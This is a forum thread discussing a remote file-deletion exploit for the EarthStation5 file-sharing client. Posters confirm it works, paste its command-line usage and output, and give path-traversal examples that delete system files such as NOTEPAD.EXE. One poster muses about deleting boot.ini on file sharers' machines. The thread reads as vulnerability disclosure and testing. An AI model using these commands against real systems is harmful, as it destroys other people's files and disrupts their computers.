http://lists.netsys.com/pipermail/fu...er/011339.html
looks like es5 has a very bad exploit, you may want to test it out but it looks legit.
Printable View
http://lists.netsys.com/pipermail/fu...er/011339.html
looks like es5 has a very bad exploit, you may want to test it out but it looks legit.
I can confirm that it works. I compiled the code with borland c++ and created a file called "test.txt" in C:\Program Files\EarthStation5\New Media Files.
It was gone... I've tried it several times... it will reboot the computer and delete any file you tell it to!Quote:
C:\Documents and Settings\user\Desktop>es5 /d test.txt /s "C:\Program Files\Eart
hStation5\New Media Files" /i 127.0.0.1 /p 31266
Sending command to delete file "test.txt" in folder "C:\Program Files\EarthStati
on5\New Media Files\"...Done!
I tested it on es5 1.1.24 build 2048.Quote:
C:\Documents and Settings\user\Desktop>es5
/R <retries> - Max UDP sendto() retries
/r - Restart remote computer's ES5.exe
/e - Tell remote computer's ES5.exe it's expired
/d <filename> - Delete file <filename>
/s <shared dir> - Remote computer's shared dir(case sensitive.)
Use quotes if path contains spaces.
/i <IP> - Remote computer's IP
/p <PORT> - Remote computer's "Search Service" port
The examples below assume remote ES5.exe is using IP=127.0.0.1 and port=1234
Example 1:
esv /r /i 127.0.0.1 /p 1234
This will restart remote computer's ES5.exe.
Example 2:
esv /e /i 127.0.0.1 /p 1234
This will force remote computer's ES5.exe to stop functioning, and let the
user know about it.
Example 3:
esv /d ..\..\..\WINDOWS\NOTEPAD.EXE /s "C:\Program Files\EarthStation5\New M
edia Files" /i 127.0.0.1 /p 1234
This will delete the file "\WINDOWS\NOTEPAD.EXE". This will not work
under Win98 (and probably Win95/WinME) but does work under WinXP (and
probably WinNT, Win2000, Win2003)
Example 4:
esv /d readme.txt /s "C:\Program Files\EarthStation5\New Media Files" /i 127
.0.0.1 /p 1234
This will delete the file "readme.txt" in the folder
"C:\Program Files\EarthStation5\New Media Files".
and works with all Windows versions
IMPORTANT:
The shared folder is case sensitive, and you must use the exact same path
as ES5.exe does. If path = "C:\Program Files\ES5\Files", then make sure
that ES5.exe doesn't use the shorter path "C:\Progra~1\ES5\Files"
or has uppercased all letters. You can find out the exact path in
ES5.exe's settings. Copy and paste that string.
The delete does not work with wild cards though. Good thing. I created several test txt files and folders. I would only delete individual files and not folders.
Good thing I haven't used this app! I only installed it to check it out...
this is a copy write advocates dream. if they knew someone was sharing their files they could delete boot.ini and restart the computer. unless the victim was preparred for this it would give them enough time to go in and grab the hard drive intact.
lends some credence to the conspiracy theory someone posted here about es5